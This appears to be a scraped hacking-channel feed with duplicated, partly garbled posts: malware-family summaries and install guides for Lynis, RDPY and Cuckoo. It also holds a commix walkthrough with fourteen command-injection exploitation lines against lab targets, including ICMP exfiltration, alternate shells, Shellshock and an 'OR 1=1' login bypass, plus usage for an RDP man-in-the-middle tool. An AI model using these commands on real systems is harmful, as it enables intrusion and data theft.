8) Mirai is a malware botnet known to compromise Internet of Things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.
9) NanoCore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.
10) Pushdo is a botnet that has been active since 2007 and operates as a service for malware and spam distribution. Pushdo is known to distribute the Cutwail spambot. The malware uses encrypted communication channels and domain generation algorithms to send instructions to its zombie hosts.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ TOP ACTIVE MALWARES IN 2020 :
T.me/UndercodeTesting
1) Emotet is a modular infostealer that downloads or drops banking trojans. It can be delivered through either malicious download links or attachments, such as PDF or macro-enabled Word documents. Emotet also incorporates spreader modules in order to propagate throughout a network. In December 2018, Emotet was observed using a new module that exfiltrates email content.
2) WannaCry is a ransomware cryptoworm using the EternalBlue exploit to spread via SMB protocol. Version 1.0 has a βkillswitchβ domain, which stops the encryption process.
3) Kovter is a fileless click fraud malware and a downloader that evades detection by hiding in registry keys. Reporting indicates that Kovter can have backdoor capabilities and uses hooks within certain APIs for persistence.
4) ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants adopted parts of itβs codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.
5) Dridex is a malware banking variant that uses malicious macros in Microsoft Office with either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns
6) IcedID is a modular banking Trojan targeting banks, payment card providers, and payroll websites. IcedID utilizes the same distribution infrastructure as Emotet. The malware can monitor a victimβs online activity by setting up local proxies for traffic tunneling, employing web injection and redirection attacks. It propagates across a network by infecting terminal servers
7) Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device
8) Mirai is a malware botnet known to compromise Internet of Things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.
9) NanoCore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.
10) Pushdo is a botnet that has been active since 2007 and operates as a service for malware and spam distribution. Pushdo is known to distribute the Cutwail spambot. The malware uses encrypted communication channels and domain generation algorithms to send instructions to its zombie hosts.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated wifi hacking- Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional
π¦FEATURES :
Automated security auditing
Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
Vulnerability detection
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/CISOfy/lynis
Execute:
2) cd lynis; ./lynis audit system
3) If you want to run the software as root, we suggest changing the ownership of the files. Use chown -R 0:0 to recursively alter the owner and group and set it to user ID 0 (root).
π¦MORE :
Parameter Abbreviated Description
--auditor "Name" Assign an auditor name to the audit (report)
--checkall -c Start the check
--check-update Check if Lynis is up-to-date
--cronjob Run Lynis as cronjob (includes -c -Q)
--help -h Shows valid parameters
--manpage View man page
--nocolors Do not use any colors
--pentest Perform a penetration test scan (non-privileged)
--quick -Q Don't wait for user input, except on errors
--quiet Only show warnings (includes --quick, but doesn't wait)
--reverse-colors Use a different color scheme for light backgrounds
--version -V Check program version (and quit)
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated wifi hacking- Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional
π¦FEATURES :
Automated security auditing
Compliance testing (e.g. ISO27001, PCI-DSS, HIPAA)
Vulnerability detection
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/CISOfy/lynis
Execute:
2) cd lynis; ./lynis audit system
3) If you want to run the software as root, we suggest changing the ownership of the files. Use chown -R 0:0 to recursively alter the owner and group and set it to user ID 0 (root).
π¦MORE :
Parameter Abbreviated Description
--auditor "Name" Assign an auditor name to the audit (report)
--checkall -c Start the check
--check-update Check if Lynis is up-to-date
--cronjob Run Lynis as cronjob (includes -c -Q)
--help -h Shows valid parameters
--manpage View man page
--nocolors Do not use any colors
--pentest Perform a penetration test scan (non-privileged)
--quick -Q Don't wait for user input, except on errors
--quiet Only show warnings (includes --quick, but doesn't wait)
--reverse-colors Use a different color scheme for light backgrounds
--version -V Check program version (and quit)
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - CISOfy/lynis: Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testingβ¦
Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional. - CISOf...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 rdp Remote Desktop Protocol :
RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event driven network engine Twisted. RDPY support standard RDP security layer, RDP over SSL and NLA authentication (through ntlmv2 authentication protocol).
twitter.com/undercodeNews
π¦ FEATURES :
RDP Man In The Middle proxy which record session
RDP Honeypot
RDP screenshoter
RDP client
VNC client
VNC screenshoter
RSS Player
π¦πβπππΈπππππΈπππβ & βπβ :
$ git clone https://github.com/citronneur/rdpy.git rdpy
$ pip install twisted pyopenssl qt4reactor service_identity rsa pyasn1
$ python rdpy/setup.py install
Or use PIP:
$ pip install rdpy
For virtualenv, you will need to link the qt4 library to it:
$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/
π¦COMMANDS :
rdpy-rdpclient
rdpy-rdpclient is a simple RDP Qt4 client.
$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]
You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot.
rdpy-vncclient
rdpy-vncclient is a simple VNC Qt4 client .
$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpscreenshot
rdpy-rdpscreenshot saves login screen in file.
$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]
rdpy-vncscreenshot
rdpy-vncscreenshot saves the first screen update in file.
$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpmitm
rdpy-rdpmitm is a RDP proxy allows you to do a Man In The Middle attack on RDP protocol. Record Session Scenario into rss file which can be replayed by rdpy-rssplayer.
$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]
Output directory is used to save the rss file with following format (YYYYMMDDHHMMSS_ip_index.rss) The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer If one of both parameters are omitted, the server use standard RDP as security layer.
rdpy-rdphoneypot
rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol.
$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_pa
π¦ TESTED BY UNDERCODE
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 rdp Remote Desktop Protocol :
RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event driven network engine Twisted. RDPY support standard RDP security layer, RDP over SSL and NLA authentication (through ntlmv2 authentication protocol).
twitter.com/undercodeNews
π¦ FEATURES :
RDP Man In The Middle proxy which record session
RDP Honeypot
RDP screenshoter
RDP client
VNC client
VNC screenshoter
RSS Player
π¦πβπππΈπππππΈπππβ & βπβ :
$ git clone https://github.com/citronneur/rdpy.git rdpy
$ pip install twisted pyopenssl qt4reactor service_identity rsa pyasn1
$ python rdpy/setup.py install
Or use PIP:
$ pip install rdpy
For virtualenv, you will need to link the qt4 library to it:
$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/
π¦COMMANDS :
rdpy-rdpclient
rdpy-rdpclient is a simple RDP Qt4 client.
$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]
You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot.
rdpy-vncclient
rdpy-vncclient is a simple VNC Qt4 client .
$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpscreenshot
rdpy-rdpscreenshot saves login screen in file.
$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]
rdpy-vncscreenshot
rdpy-vncscreenshot saves the first screen update in file.
$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]
rdpy-rdpmitm
rdpy-rdpmitm is a RDP proxy allows you to do a Man In The Middle attack on RDP protocol. Record Session Scenario into rss file which can be replayed by rdpy-rssplayer.
$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]
Output directory is used to save the rss file with following format (YYYYMMDDHHMMSS_ip_index.rss) The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer If one of both parameters are omitted, the server use standard RDP as security layer.
rdpy-rdphoneypot
rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol.
$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_pa
π¦ TESTED BY UNDERCODE
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 UPDATED Automated All-in-One OS command injection and exploitation tool.
fb.com/undercodeTesting
π¦SUPPORTED OS :
ArchStrike
BlackArch Linux
BackBox
Kali Linux
Parrot Security OS
Pentoo Linux
Weakerthan Linux
Mac OS X
Windows (experimental)
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/commixproject/commix.git
2) cd commix
3) python commix.py -h
π¦COMMANDS :
1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"
3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
4. Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
5. Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"
6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"
8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3
11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3
12. Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"
π¦ Tested by undercode on ubuntu
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 UPDATED Automated All-in-One OS command injection and exploitation tool.
fb.com/undercodeTesting
π¦SUPPORTED OS :
ArchStrike
BlackArch Linux
BackBox
Kali Linux
Parrot Security OS
Pentoo Linux
Weakerthan Linux
Mac OS X
Windows (experimental)
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/commixproject/commix.git
2) cd commix
3) python commix.py -h
π¦COMMANDS :
1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"
3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
4. Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
5. Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"
6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"
8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3
11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3
12. Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"
π¦ Tested by undercode on ubuntu
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 updated automated dynamic malware analysis system
pinterest.com/undercode_Testing
π¦πβπππΈπππππΈπππβ & βπβ :
1) $ sudo pip install -U pip setuptools
2) $ sudo pip install -U cuckoo
Although the above, a global installation of Cuckoo in your OS works mostly fine, we highly recommend installing Cuckoo in a virtualenv, which looks roughly as follows:
3) $ virtualenv venv
4) $ . venv/bin/activate
> (venv)$ pip install -U pip setuptools
> (venv)$ pip install -U cuckoo
5) for cloning > git clone https://github.com/cuckoosandbox/cuckoo.git
enjoy free malware analysis
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 updated automated dynamic malware analysis system
pinterest.com/undercode_Testing
π¦πβπππΈπππππΈπππβ & βπβ :
1) $ sudo pip install -U pip setuptools
2) $ sudo pip install -U cuckoo
Although the above, a global installation of Cuckoo in your OS works mostly fine, we highly recommend installing Cuckoo in a virtualenv, which looks roughly as follows:
3) $ virtualenv venv
4) $ . venv/bin/activate
> (venv)$ pip install -U pip setuptools
> (venv)$ pip install -U cuckoo
5) for cloning > git clone https://github.com/cuckoosandbox/cuckoo.git
enjoy free malware analysis
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) - Profile | Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011